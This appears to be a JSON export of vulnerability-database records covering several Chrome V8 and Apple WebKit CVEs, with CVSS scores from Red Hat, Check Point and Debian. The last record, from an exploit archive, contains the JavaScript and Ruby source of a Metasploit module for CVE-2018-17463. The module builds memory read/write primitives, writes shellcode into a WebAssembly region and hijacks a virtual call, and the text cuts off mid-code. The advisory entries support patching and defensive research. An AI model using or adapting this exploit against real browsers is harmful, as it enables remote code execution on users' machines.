[{"lastseen": "2022-07-09T16:34:28", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", 
"userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-10-09T06:26:34", "type": "redhatcve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2022-07-09T16:31:53", "id": "RH:CVE-2018-17463", "href": "https://access.redhat.com/security/cve/cve-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T17:50:14", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. 
Processing maliciously crafted web content may lead to arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-03T01:51:43", "type": "redhatcve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2022-07-07T12:14:36", "id": "RH:CVE-2019-8518", "href": "https://access.redhat.com/security/cve/cve-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:16:19", "description": "A remote code execution vulnerability exists in Google Chrome V8. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome V8 Remote Code Execution (CVE-2018-17463)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-09-05T00:00:00", "id": "CPAI-2018-1597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:16:59", "description": "A memory corruption vulnerability exists in Apple WebKit. 
Successful exploitation of this vulnerability could allow attackers to execute code on the target system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Memory Corruption (CVE-2018-4438)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2020-03-16T00:00:00", "id": "CPAI-2018-1319", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:14:04", "description": "A memory corruption vulnerability exists in Apple. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-03T00:00:00", "type": "checkpoint_advisories", "title": "Apple Multiple Products Memory Corruption (CVE-2019-8518)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2020-07-03T00:00:00", "id": "CPAI-2019-2192", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:17:39", "description": "An authentication bypass vulnerability exists in Apple Webkit. 
Successful exploitation of this vulnerability could allow a remote attacker to gain access to a target system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2020-02-25T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Authentication Bypass (CVE-2017-7064)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2020-02-25T00:00:00", "id": "CPAI-2017-1038", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-09T19:56:17", "description": "A remote code execution vulnerability exists in Apple iOS, tvOS and Safari. 
Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Remote Code Execution (CVE-2017-2505)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2020-02-27T00:00:00", "id": "CPAI-2017-1037", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:16", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 
5.9}, "published": "2018-11-14T15:29:00", "type": "debiancve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2018-11-14T15:29:00", "id": "DEBIANCVE:CVE-2018-17463", "href": "https://security-tracker.debian.org/tracker/CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T18:58:03", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. 
This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "debiancve", "title": "CVE-2018-4438", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-03T18:29:00", "id": "DEBIANCVE:CVE-2018-4438", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T18:58:03", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. 
Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "debiancve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-12-18T18:15:00", "id": "DEBIANCVE:CVE-2019-8518", "href": "https://security-tracker.debian.org/tracker/CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-15T18:58:03", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2018-4122", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2018-4122", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T18:58:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. 
It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "type": "debiancve", "title": "CVE-2017-7064", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-20T16:29:00", "id": "DEBIANCVE:CVE-2017-7064", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-15T18:58:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T05:29:00", "type": "debiancve", "title": "CVE-2017-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-22T05:29:00", "id": "DEBIANCVE:CVE-2017-2505", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-28T03:26:10", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "zdt", "title": "Google Chrome 67 / 68 / 69 
Object.create Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34054", "href": "https://0day.today/exploit/description/34054", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process, so the browser must be run with the --no-sandbox option for the\n payload to work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 
'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx'],\n 'DefaultTarget' => 0,\n 'Targets' => [ [ 'Automatic', { } ] ],\n 'DisclosureDate' => 'Sep 25 2018'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] \" + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n\n jscript = %Q^\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\n\nlet ab = new ArrayBuffer(8);\nlet floatView = new Float64Array(ab);\nlet uint64View = new BigUint64Array(ab);\nlet uint8View = new Uint8Array(ab);\n\nNumber.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n};\n\nBigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n};\n\nfunction hex(n) {\n return '0x' + n.toString(16);\n};\n\nfunction fail(s) {\n print('FAIL ' + s);\n throw null;\n}\n\nconst NUM_PROPERTIES = 32;\nconst MAX_ITERATIONS = 100000;\n\nfunction gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n}\n\nfunction make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n}\n\nfunction pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < 
MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return 
memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(div_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n}\n\npwn();\n^\n\n if 
